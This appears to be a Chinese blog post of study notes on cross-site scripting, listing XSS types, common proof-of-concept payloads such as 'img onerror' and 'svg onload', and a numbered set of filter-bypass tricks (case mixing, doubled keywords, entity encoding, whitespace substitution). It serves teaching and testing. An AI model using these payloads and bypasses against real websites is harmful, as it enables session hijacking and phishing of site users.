xss跨站脚本(cross-site scripting)

本质上是用户输入 js , html 代码,提交至服务器(可不经过),前端和后端均未对用户的输入和输出进
行合理的过滤和限制,导致恶意 js 代码以及 html 代码被注入到网页中
危害:钓鱼欺骗、获取会话、会话劫持、网页蠕虫病毒等;
即前端代码注入,代码注入类
代码注入的本质:把用户的输入当作代码执行;
基本流程

如何引用 js
1 、 script 标签
< script > console . log () < /script>
2 、 script 标签中的 src 属性
< script src = "http://a.com/j.js" >< /script>
3 、事件( on ),(鼠标键盘窗口)
< input onclick = console . log () >
< img src = x onerror = console . log () >
4 、 a 标签 href 属性构造伪协议
< a href = javascript : console . log () > baidu < /a>
常见构造标签:
<script>alert(1)</script>
<img src = x onerror = alert(1)>
<svg onload = alert(1)>
<input onmouseover = "console.log(5)" >
<a href = "javascript:alert(1)" >
<input type = text onclick = alert(1)>
等等
xss 分类
1 、反射型
xss 恶意代码经过服务器但不存储于服务器,一次性
2 、存储型
xss 恶意代码经过服务器且存储于服务器(文件,数据库)
3 、 dom 型(也算反射型的一种)
xss 恶意代码不经过服务器,无需和服务器交互,发生在客户端处理数据时
xss 语句及过滤
1 、无尖括号,可选择用事件触发 js 代码
2 、无法使用 script 标签及 js 事件的情况下,可选择用 a 标签引入伪协议,例:
<a href = "javascript:alert(1)" > random </a>
3 、某些属性被替换,可选择大小写绕过限制
例:
"> <a hREf = "javascript:alert(1)" > asdf </a>
用大小写穿插的方式替换 href
4 、存在过滤属性名、标签名的情况,如果过滤不严谨可尝试双写;
"> <a hrhrefef = "javascrscriptipt:alert(1)" > asdf </a>
5 、可尝试使用实体编码替换 xss 语句中值的部分,
例:
<a href = "javascript:alert(1)" > 友情链接 </a>
可替换 href 后的部分,参数无法替换
6 、观察页面,有些输入框是隐藏属性
7 、除了正常的 GET 、 POST 请求外, http 请求头,有时也可以构造 xss
8 、 ng-include, ①需要指定的是同域名下的图片或文件②搭配事件或其他 js 触发方式
9 、空格被替换,可选择类似 sql 注入中的替换方法, %0a 、 %0d 、 %09 、 / 等
10 、反单引号替换括号、中括号
11 、 img 、 input 等自闭和标签无需闭合,结尾尖括号也可省略,属性后记得加空格
12 、引入恶意 js 时,可选用邮箱格式,用户名 @ 网址,例: baidu.com@qq.com , 等价于baidu.co 作为用户名去访问qq
13 、正则不严谨时可使用空格绕过正则
14 、 svg 标签中可解析实体编码
15 、标签内增加空白符,不影响标签原有意义

相关推荐
程序员码歌9 小时前
豆包Seedream4.0深度体验:p图美化与文生图创作
android·前端·后端
urhero10 小时前
工作事项管理小工具——HTML版
前端·html·实用工具·工作事项跟踪·任务跟踪小工具·本地小程序
二十雨辰10 小时前
eduAi-智能体创意平台
前端·vue.js
golang学习记10 小时前
从0死磕全栈之Next.js connection() 函数详解:强制动态渲染的正确姿势(附实战案例)
前端
郝学胜-神的一滴10 小时前
Three.js光照技术详解:为3D场景注入灵魂
开发语言·前端·javascript·3d·web3·webgl
m0dw10 小时前
vue懒加载
前端·javascript·vue.js·typescript
国家不保护废物10 小时前
手写 Vue Router,揭秘路由背后的魔法!🔮
前端·vue.js
菜鸟‍11 小时前
【前端学习】仿Deepseek官网AI聊天网站React
前端·学习·react.js
lingggggaaaa11 小时前
小迪安全v2023学习笔记(一百三十四讲)—— Windows权限提升篇&数据库篇&MySQL&MSSQL&Oracle&自动化项目
java·数据库·windows·笔记·学习·安全·网络安全
小光学长11 小时前
基于Vue的保护动物信息管理系统r7zl6b88 (程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。
前端·数据库·vue.js